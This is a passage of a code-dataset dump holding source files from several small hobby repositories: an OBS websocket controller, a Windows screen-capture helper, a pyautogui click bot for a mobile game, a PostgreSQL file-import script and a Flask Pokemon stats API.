createPages();\n$pages.forEach($p => createGrids($p));\n\nconst $scrollup = document.getElementById('scroll-up');\nconst $scrolldown = document.getElementById('scroll-down');\n\n$scrollup.addEventListener('click', function() {\n if (curPage === 0) {\n return;\n }\n if (curPage-1 === 0) {\n this.className = `${this.className} disabled`;\n } else {\n this.className = this.className.replace('disabled', '');\n }\n active(curPage - 1, $pages);\n $scrolldown.className = $scrolldown.className.replace('disabled', '');\n curPage -= 1;\n});\n\n$scrolldown.addEventListener('click', function() {\n if (curPage === 3) {\n return;\n }\n if (curPage+1 === 3) {\n this.className = `${this.className} disabled`;\n } else {\n this.className = this.className.replace('disabled', '');\n }\n active(curPage + 1, $pages);\n $scrollup.className = $scrollup.className.replace('disabled', '');\n curPage += 1;\n});\n\nconst $screenshotWrapper = document.getElementById('screenshot-wrapper');\nconst $screenshot = document.getElementById('screenshot');\n$screenshot.src = `screenshot.jpg?v=${Math.random()}`;\nconst $drop = document.getElementsByClassName('sc-drop')[0];\nconst $sharedrop = document.getElementsByClassName('sc-share-drop')[0];\n\n$screenshot.addEventListener('error', function() {\n console.log('error');\n $screenshotWrapper.style = 'display: none';\n $drop.style = 'display: none';\n $sharedrop.style = 'display: none';\n});\n\n$screenshotWrapper.addEventListener('click', function() {\n $drop.className = `${$drop.className} active`;\n});\n\ndocument.getElementById('sc-share').addEventListener('click', function() {\n $sharedrop.className = `${$sharedrop.className} active`;\n});\n\ndocument.getElementById('sc-close').addEventListener('click', function() {\n $screenshotWrapper.style = 'left: -70vw';\n $drop.style = 'left: -20vw';\n $sharedrop.style = 'left: -20vw';\n});" }, { "alpha_fraction": 0.5369161367416382, "alphanum_fraction": 0.5580110549926758, "avg_line_length": 23.887500762939453, "blob_id": "accc791e5332cc27a33196ee2e8a52def3b71652", "content_id": "f5ba780fa2c745ab25efb12891c7bf003cadc17b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1991, "license_type": "no_license", "max_line_length": 66, "num_lines": 80, "path": "/MFC_SAMPLE/MFCSample/obs.py", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport time\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nsys.path.append('../')\nfrom obswebsocket import obsws, requests\n\n\nhost = \"172.16.0.50\"\nport = 4444\npasswd = \"gdeck\"\n\nclass OBS(object):\n def __init__(self, host, port, passwd):\n try:\n self.ws = obsws(host, port, passwd)\n self.ws.connect()\n print('Connected!')\n except Exception as e:\n print(e, file=stderr)\n\n def ToggleMute(self, *args):\n return self.ws.call(requests.ToggleMute(args[0]))\n\n def StartRecording(self, *args):\n return self.ws.call(requests.StartRecording())\n\n def StopRecording(self, *args):\n return self.ws.call(requests.StopRecording())\n\n def SetMute(self, *args):\n arg = []\n arg.append(args[0])\n arg.append(int(args[1]) > 0)\n return self.ws.call(requests.SetMute(*arg))\n\n def IncVolume(self, *args):\n v = float(self.GetVolume(args[0]))\n if v <= 0.9:\n v += 0.1\n elif v < 1.0:\n v = 1.0\n return self.ws.call(requests.SetVolume(args[0], v))\n\n def DecVolume(self, *args):\n v = float(self.GetVolume(args[0]))\n if v >= 0.1:\n v -= 0.1\n elif v > 0:\n v = 0\n return self.ws.call(requests.SetVolume(args[0], v))\n\n def SetSceneItemPosition(self, *args):\n arg = []\n arg.append(args[1])\n arg.append(float(args[2]))\n arg.append(float(args[3]))\n arg.append(args[0])\n return self.ws.call(requests.SetSceneItemPosition(*arg))\n\n def GetVolume(self, *args):\n return self.ws.call(requests.GetVolume(*args)).getVolume()\n\n def exit(self):\n self.ws.disconnect()\n\n\nif __name__ == '__main__':\n obs = OBS(host, port, passwd)\n if sys.argv[1]:\n func = getattr(obs, sys.argv[1])\n r = func(*sys.argv[2:])\n print(r)\n print('exited')\n obs.exit()\n" }, { "alpha_fraction": 0.7448275685310364, "alphanum_fraction": 0.7448275685310364, "avg_line_length": 19.714284896850586, "blob_id": "dd2882140e746c6ae2d9684688bcc49efe353d6b", "content_id": "af5fec9046b66238195948c124557954d1bc2dc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 145, "license_type": "no_license", "max_line_length": 59, "num_lines": 7, "path": "/README.md", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "# GDeck\n\n# Run\n+ open `MFCSample.vcxproj` in MFCSample using Visual Studio\n+ Compile the code\n+ Install ARX on your device\n+ Connect to the host\n" }, { "alpha_fraction": 0.7244898080825806, "alphanum_fraction": 0.7244898080825806, "avg_line_length": 18.600000381469727, "blob_id": "0bddb36df84b76201181d5c0977706f0de9b5158", "content_id": "4c65aca1acfefdef8d245752b6129ab098a2a2c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 98, "license_type": "no_license", "max_line_length": 28, "num_lines": 5, "path": "/MFC_SAMPLE/MFCSample/WindowsControl.h", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "#include <wingdi.h>\n#include <shlobj.h>\n\nHBITMAP get_screen_bitmap();\nvoid save_to_disk(HBITMAP);\n" }, { "alpha_fraction": 0.7276560068130493, "alphanum_fraction": 0.733558177947998, "avg_line_length": 24.7608699798584, "blob_id": "12712371534ea94e9af783f01f7a63c6ba290e13", "content_id": "0f965774b7635d4ae3110224ebcb13c6a1d7bed5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 100, "num_lines": 46, "path": "/MFC_SAMPLE/MFCSample/WindowsControl.cpp", "repo_name": "Logi-Meichu/GDeck", "src_encoding": "UTF-8", "text": "#include \"stdafx.h\"\n#include \"WindowsControl.h\"\n#include <string>\n\nusing namespace std;\n\nHBITMAP get_screen_bitmap()\n{\n\t// get the device context of the screen\n\tHDC hScreenDC = CreateDC(L\"DISPLAY\", NULL, NULL, NULL);\n\t// and a device context to put it in\n\tHDC hMemoryDC = CreateCompatibleDC(hScreenDC);\n\n\tint width = GetDeviceCaps(hScreenDC, HORZRES);\n\tint height = GetDeviceCaps(hScreenDC, VERTRES);\n\n\t// maybe worth checking these are positive values\n\tHBITMAP hBitmap = CreateCompatibleBitmap(hScreenDC, width, height);\n\n\t// get a new bitmap\n\tHBITMAP hOldBitmap = (HBITMAP) SelectObject(hMemoryDC, hBitmap);\n\n\tBitBlt(hMemoryDC, 0, 0, width, height, hScreenDC, 0, 0, SRCCOPY);\n\thBitmap = (HBITMAP) SelectObject(hMemoryDC, hOldBitmap);\n\n\t// clean up\n\tDeleteDC(hMemoryDC);\n\tDeleteDC(hScreenDC);\n\n\treturn hBitmap;\n\t// now your image is held in hBitmap. You can save it or do whatever with it\n\n}\n\nvoid save_to_disk(HBITMAP bmp)\n{\n\n\twchar_t mypicturespath[256];\n\tHRESULT result = SHGetFolderPath(NULL, CSIDL_MYPICTURES, NULL, SHGFP_TYPE_CURRENT, mypicturespath);\n\n\t//string path({mypicturespath, \"\\\\\", \"filename.jpg\" });\n\n\tCImage image;\n\timage.Attach(bmp);\n\timage.Save(L\"filename.jpg\");\n}\n\n" } ]
5
Mot0511/Standoff2Bot
https://github.com/Mot0511/Standoff2Bot
5d86e7f1b096d9734248692c4e7123d9f18a0532
17c2862cf4a4759ff1773dd05a7bb159e9073b63
d8d0337f5a181d81f17e0c4fb5c1ccc8ee9f31ec
refs/heads/master
2023-03-30T17:35:41.689448
2021-04-06T17:01:51
2021-04-06T17:01:51
355,266,956
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5648854970932007, "alphanum_fraction": 0.6444929242134094, "avg_line_length": 20.34883689880371, "blob_id": "198cb1dbb58ec796649cb8cb3bfed48982be2c9a", "content_id": "03dcd658a0494e6a1d191b7a68f554a9214066fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 917, "license_type": "no_license", "max_line_length": 52, "num_lines": 43, "path": "/main.py", "repo_name": "Mot0511/Standoff2Bot", "src_encoding": "UTF-8", "text": "from time import sleep\nimport pyautogui\nimport time\n\nscreenWidth, screenHeight = pyautogui.size ()\ncurrentMouseX, currentMouseY = pyautogui.position ()\n\n\ncoins = 10\ncount = coins // 5\n\nfor i in range(0, count):\n pyautogui.moveTo(799, 198)\n pyautogui.click()\n time.sleep(25)\n pyautogui.moveTo(98, 393)\n pyautogui.click()\n time.sleep(3)\n pyautogui.moveTo(1570, 72)\n pyautogui.click()\n time.sleep(3)\n pyautogui.moveTo(653, 656)\n pyautogui.click()\n time.sleep(35)\n # ----------------------\n pyautogui.moveTo(1822, 49)\n pyautogui.click()\n time.sleep(3)\n pyautogui.moveTo(1900, 984)\n pyautogui.click()\n time.sleep(3)\n pyautogui.moveTo(1907, 1021)\n pyautogui.click()\n time.sleep(3)\n pyautogui.moveTo(1308, 261)\n pyautogui.click()\n time.sleep(3)\n pyautogui.moveTo(1900, 984)\n pyautogui.click()\n time.sleep(3)\n\npyautogui.alert('The end')\n'OK'" } ]
1
willcheung/db-importer
https://github.com/willcheung/db-importer
ebd7c674c3c5887b2845bfe4176f7f17c7696c1c
3340dc431613491cfc7b3f62818d6b8a202c1f3c
2a0c699c4e9ef61d65b41e68de94dcae9a88f8c8
refs/heads/master
2021-01-23T11:04:36.170112
2013-09-04T05:34:31
2013-09-04T05:34:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6455981731414795, "alphanum_fraction": 0.6636568903923035, "avg_line_length": 30.714284896850586, "blob_id": "afc78ec120e1889cd3b89e63f8bf603f53bfd7d0", "content_id": "a5ad3c34cdb3a06514e2accd89eed535f9d2c92d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 443, "license_type": "no_license", "max_line_length": 122, "num_lines": 14, "path": "/import_conf.py", "repo_name": "willcheung/db-importer", "src_encoding": "UTF-8", "text": "conn_info = {\n\t\t\t\t'host' : 'localhost',\n\t\t\t\t'dbname' : 'db-importer-test',\n\t\t\t\t'user' : 'wcheung',\n\t\t\t\t'password' : 'wcheung'\n}\n\ndelimiter = '\t'\n\n# If the file has date field (ending with '_dt'), it will be converted into Postgres friendly date (ex: 2012-12-01)\nfile_date_format = \"%Y-%m-%d\"\n\n# Sometimes there is an extra delimiter at the end of each line. This optionally removes the last character of each line. \nremove_last_char = False" }, { "alpha_fraction": 0.6567164063453674, "alphanum_fraction": 0.6630352139472961, "avg_line_length": 35.137794494628906, "blob_id": "35f5aac72b08a48a4cc66bb6d109760020bbde55", "content_id": "5ec7a4b7d8c2ea0761bdecf7cd461c274384ddee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9179, "license_type": "no_license", "max_line_length": 207, "num_lines": 254, "path": "/import.py", "repo_name": "willcheung/db-importer", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport re\nimport sys\nimport psycopg2\nimport argparse\nimport logging\nimport datetime\nimport time\nimport xlrd\nimport csv\nfrom import_conf import * # config file\n\ndef process_txt_files(f, column_names):\n\tline_num = 1 # which line number its reading from source file. starts at 1 including header.\n\trow_count = 0 # how many rows are inserted\n\tskip_count = 1 # how many rows are skipped. starts at 1 including header.\n\t\n\tfor line in f:\n\t\tvals = []\n\t\tline_num = line_num + 1\n\t\t\t\n\t\t# line.strip()[:-1] is there to remove an extra '$' (delimiter) at the end of line. \n\t\t# This is only used if you have one extra delimiter at the end of each line.\n\t\tif remove_last_char:\n\t\t\tl = line.strip()[:-1]\n\t\telse:\n\t\t\tl = line.strip()\n\t\t\t\t \n\t\tif file_type == \"txt\":\n\t\t\tcol = l.split(txt_delimiter)\n\t\telif file_type == \"csv\":\n\t\t\tcol = csv.reader([l], skipinitialspace=True)\n\t\t\tcol = col.next()\n\t\t\t\n\t\tfor col_idx, col in enumerate(col): \n\t\t\tif \"-date\" in str(column_names[col_idx]).lower() and col != '':\n\t\t\t\ttry:\n\t\t\t\t\t# convert date format to Postgres friendly date\n\t\t\t\t\tt = datetime.datetime.strptime(col, file_date_format) \n\t\t\t\t\tvals.append(t.strftime(\"%Y-%m-%d\"))\n\t\t\t\texcept ValueError as e:\n\t\t\t\t\tskip_count = skip_count + 1\n\t\t\t\t\tlogging.error(\"ERROR converting date on line {0} of {1}\\nData: {2}\\n{3}\".format(row_count, filename, line, e))\n\t\t\t\t\tvals = [] # don't insert this line\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tvals.append(col)\n\t\t\t\n\t\t# sometimes a line is formatted incorrectly\n\t\t# skip row and rollback transaction\n\t\tif vals:\n\t\t\ttry:\n\t\t\t\tinsert_string = \"insert into \" + domain + \" (\"+\",\".join(column_names) + \")\" + \" values (\" + \",\".join(['%s'] * len(vals)) + \")\"\n\t\t\t\tcursor.execute(insert_string, vals)\n\t\t\t\tconn.commit()\n\t\t\t\trow_count=row_count+1\n\t\t\texcept psycopg2.Error as e:\n\t\t\t\tconn.rollback()\n\t\t\t\tskip_count = skip_count + 1\n\t\t\t\tlogging.error(\"ERROR inserting to DB on line {1} of {2}.\\nData: {3}\\n{0}\".format(e.pgerror, row_count, filename, line))\n\t\n\treturn line_num,row_count\n\ndef process_xls_files(sheet):\n\tline_num = 1 # which line number its reading from source file. starts at 1 including header.\n\trow_count = 0 # how many rows are inserted\n\tskip_count = 1 # how many rows are skipped. starts at 1 including header.\n\t\n\tfor row_idx in xrange(1, sheet.nrows):\n\t\tvals = []\n\t\tline_num = line_num + 1\n\t\t\n\t\tfor col_idx, col in enumerate(sheet.row(row_idx)):\n\t\t\tif col_idx not in column_skip:\n\t\t\t\tif isinstance(col.value, str) or isinstance(col.value, unicode):\n\t\t\t\t\tif isinstance(col.value, str) and len(col.value.strip()) == 0:\n\t\t\t\t\t\tvals.append(None)\n\t\t\t\t\telif isinstance(col.value, unicode) and len((col.value).strip()) == 0:\n\t\t\t\t\t\tvals.append(None)\n\t\t\t\t\telse:\n\t\t\t\t\t\tvals.append(col.value[:1023])\n\t\t\t\telif \"date\" in str(column_names[col_idx]).lower() or \"dtc\" in str(column_names[col_idx]).lower(): # converts excel-stored float into dates\n\t\t\t\t\tif (col.value is not None) and int(col.value) > 60:\n\t\t\t\t\t\tvals.append(str(datetime.datetime(*xlrd.xldate_as_tuple(col.value, sheet.book.datemode))))\n\t\t\t\t\telse:\n\t\t\t\t\t\tvals.append(None)\n\t\t\t\telse:\n\t\t\t\t\tvals.append(col.value)\n\t\t\t\t\t\n\t\t# values = ['%s'] * len(vals)\n\t\t# values = [value.replace('\\'TIMESTAMP', 'TIMESTAMP\\'') for value in values]\n\n\t\tinsert_string = \"insert into \" + domain + \" (\"+\",\".join(column_names) + \")\" + \" values (\" + \",\".join(['%s'] * len(vals)) + \")\"\n\t\t#print insert_string\n\t\trow_count=row_count+1\n\t\tcursor.execute(insert_string, vals)\n\t\tconn.commit()\n\t\n\treturn line_num,row_count\n\ndef create_tables(domain, column_names):\n\tdrop_string = \"drop table if exists \" + domain + \";\"\n\tlogging.info(\"Dropping table \"+domain)\n\tprint drop_string\n\tcreate_string = \"create table \" + domain + \" (id_ serial,\\n \" + \" varchar(1024),\\n\".join(column_names) + \" varchar(1024));\" \n\tlogging.info(\"Creating table \"+domain)\n\tprint create_string\n\tcursor.execute(drop_string)\n\tcursor.execute(create_string)\n\tconn.commit()\n\ndef delete_data(domain):\n\tdelete_string = \"delete from \" + domain + \";\"\n\tlogging.info(\"Deleting data from \" + domain)\n\tprint \"Deleting data from \" + domain\n\tcursor.execute(delete_string)\n\tconn.commit()\n\n########## Main Starts Here ############\nparser = argparse.ArgumentParser(description='Parse delimited text files and load them into PostgreSQL. The script can optionally create tables based on the files. If table exists, it will append the data.')\nparser.add_argument(\"path\", help=\"path of excel or text files. Example: ~/directory_of_files/\")\nparser.add_argument(\"--file\", help=\"only process a SINGLE file from [path] argument and ignore other files. Example: --file filename.xls will process only ~directory_of_files/filename.xls\")\nparser.add_argument(\"--create_tables\", help=\"Drops table if it exists. Creates db table.\", action=\"store_true\")\nparser.add_argument(\"--delete_data\", help=\"Deletes data from table without dropping table.\", action=\"store_true\")\nargs = parser.parse_args()\n\npath = args.path\nfiles = None\nfile_type = None\n\nif args.file:\n\tfile = args.file\n\tfiles = filter(lambda x: file == x, os.listdir(path))\n\tif not files:\n\t\tprint \"Can't find %s. Bye bye.\" % file\n\t\tsys.exit()\n\t\t\n\tif \".txt\" in file.lower():\n\t\tfile_type = \"txt\"\n\telif \".csv\" in file.lower():\n\t\tfile_type = \"csv\"\n\telif \".xlsx\" in file or \".xls\" in file:\n\t\tfile_type = \"xls\"\n\telse: \n\t\tprint \"File is not .txt or .xls / .xlsx. Please specify a new file.\"\n\t\tsys.exit()\nelse: # process all files in [path]\n\tfiles = filter(lambda x: \".txt\" in x.lower(), os.listdir(path))\n\tfile_type = \"txt\"\n\tif not files:\n\t\tfiles = filter(lambda x: \".csv\" in x, os.listdir(path))\n\t\tfile_type = \"csv\"\n\t\tif not files:\n\t\t\tfiles = filter(lambda x: \".xlsx\" in x or \".xls\" in x, os.listdir(path))\n\t\t\tfile_type = \"xls\"\n\t\t\tif not files:\n\t\t\t\tprint \"No files are found.\"\n\t\t\t\tsys.exit()\n\nprint files\n\nlog_filename = datetime.datetime.now().strftime('log_%m-%d-%Y.log')\nlogging.basicConfig(filename=log_filename, level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n\nconn_string = \"host='{0}' dbname='{1}' user='{2}' password='{3}'\".format(conn_info['host'], conn_info['dbname'], conn_info['user'], conn_info['password']) \nlogging.info(\"Connecting to server...\")\nconn = psycopg2.connect(conn_string)\ncursor = conn.cursor()\nlogging.info(\"Connected to server\")\n\nlogging.info(\"Reading %s files: %s\" % (str(len(files)),str(files)))\nprocessed_domain = [] # initialize domain <-> filename mapping\n\nfor filename in files:\n\tcolumn_skip = set() # some columns are 0 len \n\tcolumn_names = [] # cleaned up column names\n\txls_column_names = [] # original column names (from excel)\n\tlines_read = 0\n\trows_inserted = 0\n\n\tdomain = os.path.splitext(filename)[0].replace(' ','').lower() # create table based on filename\n\t\n\tif domain is None:\n\t\tprint \"File does not match domain: %s\" % filename\n\t\tlogging.info(\"File does not match domain: %s\" % filename)\n\t\tcontinue\n\t\n\t\n\t# Get columns\n\tif file_type == \"txt\" or file_type == \"csv\":\n\t\twith open(path + '/' + filename, 'rU') as f:\n\t\t\t# get the columns by reading first line\n\t\t\tif file_type == \"csv\":\n\t\t\t\tcolumn_names = f.readline().strip().split(',')\n\t\t\telse:\n\t\t\t\tcolumn_names = f.readline().strip().split(txt_delimiter)\n\n\t\t\t# get rid of unicodes, dashes and spaces in column names\n\t\t\tcolumn_names = [re.sub(r'[\\W]+','',c.replace('\\xef\\xbb\\xbf', '').replace('-','_').replace(' ','_')) for c in column_names]\n\t\t\n\t\t\tprint \"\\nGetting columns from \" + filename\n\t\t\tprint column_names\n\t\t\t\n\t\t\t# Create table from columns\n\t\t\tif domain not in processed_domain: # first time seeing this domain - create table and adapter node\n\t\t\t\tprocessed_domain.append(domain) # push domain into processed list\n\t\t\n\t\t\t\tif args.create_tables:\n\t\t\t\t\tcreate_tables(domain, column_names)\n\t\t\t\n\t\t\t\tif args.delete_data:\n\t\t\t\t\tdelete_data(domain)\n\t\t\t\n\t\t\t# now insert the data\n\t\t\tlogging.info(\"Inserting data into \"+domain+\" from \"+str(filename))\n\t\t\tlines_read,rows_inserted = process_txt_files(f, column_names)\n\n\telif file_type == \"xls\":\n\t\tsheet = xlrd.open_workbook(path + '/' + filename).sheets()[0]\n\t\t\n\t\t# get the columns\n\t\tfor column_index, column in enumerate([col.value for col in sheet.row(0)]):\n\t\t\t# some of these end up being 0 len\n\t\t\tif(len(column) == 0):\n\t\t\t\tcolumn_skip.add(column_index)\n\t\t\t\tcontinue\n\t\t\t# elif \"comment\" in str(column).lower(): # ignore comments\n\t\t\t# \tcolumn_skip.add(column_index)\n\t\t\t# \tcontinue\n\t\t\txls_column_names.append(str(column))\n\t\t\tcolumn_names = [re.sub(r'[\\W]+','',c.replace('-','_').replace(' ','_')) for c in xls_column_names]\n\n\t\tprint \"\\nGetting columns from \" + filename\n\t\tprint column_names\n\t\t\n\t\t# Create table from columns\n\t\tif domain not in processed_domain: # first time seeing this domain - create table and adapter node\n\t\t\tprocessed_domain.append(domain) # push domain into processed list\n\t\t\n\t\t\tif args.create_tables:\n\t\t\t\tcreate_tables(domain, column_names)\n\t\t\t\n\t\t\tif args.delete_data:\n\t\t\t\tdelete_data(domain)\n\t\t\n\t\t# now insert the data\n\t\tlogging.info(\"Inserting data into \"+domain+\" from \"+str(filename))\n\t\tlines_read,rows_inserted = process_xls_files(sheet)\n\t\n\tlogging.info(\"----- READ %s rows (incl. header) from %s | INSERTED %s rows into %s -----\" % (lines_read, filename, rows_inserted, domain))\n\n\nlogging.info(\"Finished processing %s files. All done!\" % str(len(files)))\n" }, { "alpha_fraction": 0.7263763546943665, "alphanum_fraction": 0.733771562576294, "avg_line_length": 33.28168869018555, "blob_id": "0bd279ac93749fafc26c142f3ccfae55b8d10892", "content_id": "4f2541837180baeba068ddae83de5277e29f6446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2434, "license_type": "no_license", "max_line_length": 165, "num_lines": 71, "path": "/README.md", "repo_name": "willcheung/db-importer", "src_encoding": "UTF-8", "text": "db-importer\n===========\nPython script that imports any Excel or text file with any delimiter into PostgreSQL database.\n\n### Setting up libraries\n* Make sure you have postgresql installed.\n* Xcode installed\n\n#### Install psychopg2 (for talking to postgres)\n* Download src from http://initd.org/psycopg/download/\n* Follow instructions. If you get 'unable to execute clang...' error, follow http://jaranto.blogspot.com/2012/08/os-x-unable-to-execute-clang-no-such.html\n\n#### Install xlrd (for talking to excel)\n* Download src from https://pypi.python.org/pypi/xlrd/0.9.2\n* Any OS: Unzip the .zip file into a suitable directory, chdir to that directory, then do \"sudo python setup.py install\".\n\n\n**Features:**\n\n* Configuration file to set db connection info\n* Reads any XLS or TXT file with any delimiter\n* Reads and parses multiple files into same or different tables\n* Error logging and exception handling that returns skipped rows\n* Option to create tables from filenames\n* Option to append or delete data\n* Option to convert date data from any format to SQL friendly format\n\n### Usage:\n*Note:* Place all the xls or csv files in a single directory. db-importer will read all the files in that directory by default, unless you specify a single filename.\n\nInsert or append data from multiple files to existing tables:\n```\npython import.py [path/to/your/files]\n```\n\nInsert or append data from SINGLE file to an existing table:\n```\npython import.py [path/to/your/files] --file [filename.xls]\n```\n\nCreate tables (note: this will drop tables if they exist):\n```\npython import.py --create_tables [path/to/your/files]\n```\n\nRefresh data (delete data from tables and reload)\n```\npython import.py --delete_data [path/to/your/files]\n```\n\t\n**Configuration:**\n```python\nconn_info = {\n\t\t\t\t'host' : 'localhost',\n\t\t\t\t'dbname' : 'mydb',\n\t\t\t\t'user' : 'postgres',\n\t\t\t\t'password' : 'postgres'\n}\n\ndelimiter = '$'\n\n# If the file has date field (ending with '_dt'), it will be converted into Postgres friendly date (ex: 2012-12-01)\nfile_date_format = \"%Y%m%d\"\n\n# Sometimes there is an extra delimiter at the end of each line. This optionally removes the last character of each line. \nremove_last_char = True\n```\n\n**Future Improvements**\n* Create table columns based on XLS cell types. Currently the script creates a table with all varchar columns.\n* Insert into existing table that is not varchar. Currently the script only inserts strings into columns.\n" } ]
3
MarsBarLee/PokemonAPIFlask
https://github.com/MarsBarLee/PokemonAPIFlask
78efa423c188c2a3623ed681468bdd48227f6325
5e23bfbd8729d6cfe290449adaab784e9d8f531f
9152c4a527b423589047cd6f671b6ad8738ec319
refs/heads/master
2022-11-13T03:54:54.979629
2019-12-18T18:34:56
2019-12-18T18:34:56
228,229,692
0
1
null
2019-12-15T18:17:20
2019-12-18T18:35:23
2019-12-18T18:35:19
Python
[ { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7117000818252563, "avg_line_length": 36.60975646972656, "blob_id": "5493c2fc827f189ef9515412b3e43f7b0d16e6ec", "content_id": "b280afa2193f7ee4a2a60e384666022572862bed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1549, "license_type": "no_license", "max_line_length": 325, "num_lines": 41, "path": "/views/pokemons.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "# pokemons.py is the View of the MVC pattern.\n# this file is equivalent to Routes in Node (I think?)\n\nfrom flask import Blueprint, abort, current_app, g\n # Blueprints are like React components: A blueprint defines a collection of views, templates, static files and other elements that can be applied to an application. For example, let’s imagine that we have a blueprint for an admin panel. This blueprint would define the views for routes like /admin/login and /admin/dashboard\nimport json\nfrom repos import PokemonRepo\n # from views->pokemon_repo.py, import the class PokemonRepo\nfrom data_access import PokemonDataAccess\nfrom flasgger import Swagger\n\npokemons = Blueprint('pokemons', __name__)\n\[email protected]('/pokemon/stats/<code>', methods = ['GET']) # code is pokemon's name\ndef by_stats(code):\n repo = PokemonRepo(PokemonDataAccess())\n response = repo.get_stats(code)\n\n if (response == None):\n abort(404)\n return response\n # View of MVC pattern. Already JSONified on pokemon_repo.py which is the Model of MVC pattern\n\[email protected]('/pokemon/capture_rate/<code>', methods = ['GET'])\ndef capture_rate(code):\n repo = PokemonRepo(PokemonDataAccess())\n response = repo.get_capture_rate(code)\n\n if (response == None):\n abort(404)\n return response\n\n \[email protected]('/pokemon/general_info/<code>', methods = ['GET'])\ndef gen_info(code):\n repo = PokemonRepo(PokemonDataAccess())\n response = repo.get_gen_info(code)\n\n if (response == None):\n abort(404)\n return response\n\n\n\n\n\n" }, { "alpha_fraction": 0.6373937726020813, "alphanum_fraction": 0.6373937726020813, "avg_line_length": 36.78571319580078, "blob_id": "ff8646fef31618365c837ac8e80b135fc630dda7", "content_id": "9971da7b11c5285e7663e69c70b09c683c51354d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "no_license", "max_line_length": 184, "num_lines": 28, "path": "/repos/pokemon_repo.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "# pokemon_repo.py is the Controller of the MVC pattern.\nimport json\nimport pandas as pd\n\nclass PokemonRepo(object):\n\n def __init__(self, da):\n self.__datastore = da\n\n def get_stats(self, code):\n result = self.__datastore.get_stats(code) # refer to pokemon_dao.py which is the Model of MVC pattern, for how get_status function works\n if result is None:\n return None\n return result.to_json(orient='records')\n # Encoding/decoding a Dataframe using 'records' formatted JSON. Dataframe is default is ‘columns’ allowed values are: {‘split’,’records’,’index’,’columns’,’values’,’table’}\n # Controller of MVC pattern\n\n def get_gen_info(self, code):\n result = self.__datastore.get_gen_info(code)\n if result is None:\n return None\n return result.to_json(orient='records')\n\n def get_capture_rate(self, code):\n result = self.__datastore.get_capture_rate(code)\n if result is None:\n return None\n return result.to_json(orient='records')\n\n" }, { "alpha_fraction": 0.6502057909965515, "alphanum_fraction": 0.6502057909965515, "avg_line_length": 48.82352828979492, "blob_id": "ae1df5cbde0fae92795be869340f70d847c148a0", "content_id": "e0a359e82b0ffcdb70ec71712a5590bcb5b3aaba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1701, "license_type": "no_license", "max_line_length": 149, "num_lines": 34, "path": "/data_access/pokemon_dao.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "# pokemon_dao.py is the Model of the MVC pattern. The Model takes information from the database, our pokemon.csv. We use Restful API \nimport pandas as pd\n\nclass PokemonDataAccess(object):\n\n def __init__(self):\n self.df = pd.read_csv('pokemon.csv') # use pandas to read csv\n\n\n def get_stats(self, code):\n # this should return a pre-set dataframe(rows, columns) in the format expected by the repository\n # df['column_name']\n df = self.df[['name','attack', 'defense', 'speed']] # selecting specific columns. the kaggle csv has multple columns to choose from\n pokemon_stats = df.loc[df['name'] == code]\n # Acess dataframe, return those with column name = name you're looking for in url. In pokemons.py, @pokemons.route('/pokemon/stats/<code>\n # pandas.DataFrame.loc. Access a group of rows and columns by labels\n \n return pokemon_stats # return the column values. Will be jsonified in pokemon_repo.py which is the Controller of MVC controller\n \n def get_capture_rate(self, code):\n # this should return a pre-set dataframe in the format expected by the repo\n df = self.df[['name','capture_rate']]\n pokemon_capture_rate = df.loc[df['name'] == code]\n \n return pokemon_capture_rate \n \n\n\n def get_gen_info(self, code):\n # this should return a pre-set dataframe in the format expected by the repo\n # this should return a pre-set dataframe in the format expected by the repo\n df = self.df[['name','abilities', 'classfication', 'pokedex_number', 'generation']]\n pokemon_gen_info = df.loc[df['name'] == code]\n return pokemon_gen_info " }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 22, "blob_id": "0df38ecca103ba198f9b8c3d666fe5014ec05b00", "content_id": "db4e3df9dc2994f955afe7e39b0a40cf730cc6d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/repos/__init__.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": "__all__=['pokemon_repo']\n\nfrom repos.pokemon_repo import PokemonRepo" }, { "alpha_fraction": 0.7241379022598267, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 18.33333396911621, "blob_id": "a98c496cbd852e076f124e52a27b44afca9581e9", "content_id": "2deee061859824bf2d39f67a63a0f08f9c4e9250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 35, "num_lines": 3, "path": "/views/__init__.py", "repo_name": "MarsBarLee/PokemonAPIFlask", "src_encoding": "UTF-8", "text": 